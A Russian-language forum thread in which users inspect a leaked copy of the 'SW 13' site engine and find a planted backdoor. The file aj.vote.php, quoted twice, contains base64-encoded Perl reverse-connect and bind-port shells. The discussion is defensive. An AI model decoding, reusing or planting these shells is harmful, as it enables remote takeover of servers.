Перейти к содержанию
Авторизация  
CrazyCort

Чем опасен SW 13

Рекомендуемые сообщения

Наткнулся на раскодированые файлы sw13.Автор который раскодировал утверждает что sw лучше не использовать.

Интересует чем опасен sw13? Шеллы ? Бэкдоры?

 

upload.rar

Изменено пользователем CrazyCort

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

антивирусник ругается на SHELL

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

антивирусник ругается на SHELL

Антивирус не ругается по крайне мере у меня.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Вечная тема :D

А теперь задумайтесь о том что многие сервера с онлайном 700 + стартовали на СВ и небыли взломаны.

А потом подумайте о своих проектах с онлайном 100 и подумайте, кому они нужны ?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Вечная тема :D

А теперь задумайтесь о том что многие сервера с онлайном 700 + стартовали на СВ и небыли взломаны.

А потом подумайте о своих проектах с онлайном 100 и подумайте, кому они нужны ?

Тоже верно. Просто интересно что там, пхп не силен. Изменено пользователем CrazyCort

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Тоже верно. Просто интересно что там, пхп не силен.

Тут не вооруженным глазом можно понять aj.vote.php

$back_connect_p = 'IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7';
$bind_port_p = 'IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=';

В стандартном стресе вроде нет такого файла.

Изменено пользователем ncsSpawN
  • Upvote 1

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Отлично шелы распространяем!

aj.vote.php!

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Тут не вооруженным глазом можно понять aj.vote.php

$back_connect_p = 'IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7';
$bind_port_p = 'IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=';

В стандартном стресе вроде нет такого файла.

На стрессе, на последнем который в шаре, такого файла действительно нет. 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Знаю только что стресс можно взломать если права не правильные стоят... Ну это если св клиентский....

 

А то что ты дал это просто кто то закинул шелл в св

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Это св но не чистый, пилнный кем - то уже.

ЧАсть файлов\папок вообще не соответсвтует купленому св13

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

А как узнать какой у меня стоит Движок СВ шара или куплен где ето посмотреть можна ? 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

А как узнать какой у меня стоит Движок СВ шара или куплен где ето посмотреть можна ? 

Негде просто шаровый это слитый купленый проше говоря  ток по ключу можно определить и все у автора

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Для публикации сообщений создайте учётную запись или авторизуйтесь

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти
Авторизация  

  • Последние посетители   0 пользователей онлайн

    Ни одного зарегистрированного пользователя не просматривает данную страницу

×
×
  • Создать...